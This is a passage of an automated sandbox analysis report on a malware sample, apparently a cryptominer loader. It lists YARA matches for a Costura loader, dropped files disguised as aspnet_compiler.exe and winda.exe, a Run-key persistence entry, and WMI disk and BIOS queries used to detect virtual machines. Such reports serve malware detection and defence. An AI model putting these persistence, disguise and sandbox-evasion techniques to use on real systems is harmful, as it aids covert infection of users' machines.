                      Source: Binary string: 28c21ad7-5072-47e8-89f2-38d62f1859ec<Module>costura.classlibrary1.dll.compressedcostura.classlibrary1.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.protobuf-net.dll.compressedFyzzzkou.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: aspnet_compiler.exe, 00000012.00000002.506737600.000001454AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp
                      Source: Binary string: costura.classlibrary1.pdb.compressed source: aspnet_compiler.exe, 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256 source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp
                      Source: Binary string: $costura.classlibrary1.pdb.compressed source: aspnet_compiler.exe, 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256 source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe.0.dr
                      Source: Binary string: protobuf-net.pdb source: aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Windows10\Desktop\LicencingSystem2\PureMiner_Shared\obj\Debug\ClassLibrary1.pdb source: aspnet_compiler.exe, 00000007.00000002.559151379.0000024752700000.00000004.00020000.sdmp, aspnet_compiler.exe, 00000012.00000002.505987468.000001453ADA0000.00000004.00020000.sdmp, aspnet_compiler.exe, 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Costura Assembly LoaderShow sources
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1453ad50000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e81bb90000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bee5db8.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bee5db8.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454b0f5db8.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454afda140.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454b11ddf0.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.aspnet_compiler.exe.24762a65db8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bf0ddf0.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.aspnet_compiler.exe.24752750000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454b0f5db8.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.aspnet_compiler.exe.24762a8ddf0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.3.aspnet_compiler.exe.24762a65db8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bdca140.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.aspnet_compiler.exe.1454ae59a38.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.1e82bc49a38.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.505864982.000001453AD50000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529218916.000001E81BB90000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.506737600.000001454AE51000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.519716575.00000247629EB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.559261310.0000024752750000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.507488204.000001454AFDA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 2808, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeCode function: 0_2_005C31DA push rbp; iretd 0_2_005C31F2
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeCode function: 0_2_00007FFC08829286 push esi; iretd 0_2_00007FFC08829287
                      Source: C:\Users\user\AppData\Roaming\winda.exeCode function: 9_2_004931DA push rbp; iretd 9_2_004931F2
                      Source: C:\Users\user\AppData\Roaming\winda.exeCode function: 12_2_00CA31DA push rbp; iretd 12_2_00CA31F2
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 18_2_00007FFC088232EC pushad ; iretd 18_2_00007FFC088232ED
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 18_2_00007FFC08824DFA push esp; retf 18_2_00007FFC08824E03
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 20_2_00007FFC088232EC pushad ; iretd 20_2_00007FFC088232ED
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeCode function: 20_2_00007FFC08824DFA push esp; retf 20_2_00007FFC08824E03
                      Source: frF39bBsa7.exeStatic PE information: 0xCC2CB512 [Tue Jul 19 18:46:42 2078 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99833264262
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99833264262
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile created: C:\Users\user\AppData\Roaming\winda.exeJump to dropped file
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeFile created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to dropped file
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run windaJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run windaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeKey value created or modified: HKEY_CURRENT_USER\Software\969E16358F1BD3B0AE052848B917C847 PluginJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\frF39bBsa7.exe TID: 4540Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe TID: 6424Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe TID: 6424Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe TID: 1240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exe TID: 1860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exe TID: 5968Thread sleep time: -922337203685477s >= -30000sJump to behavior
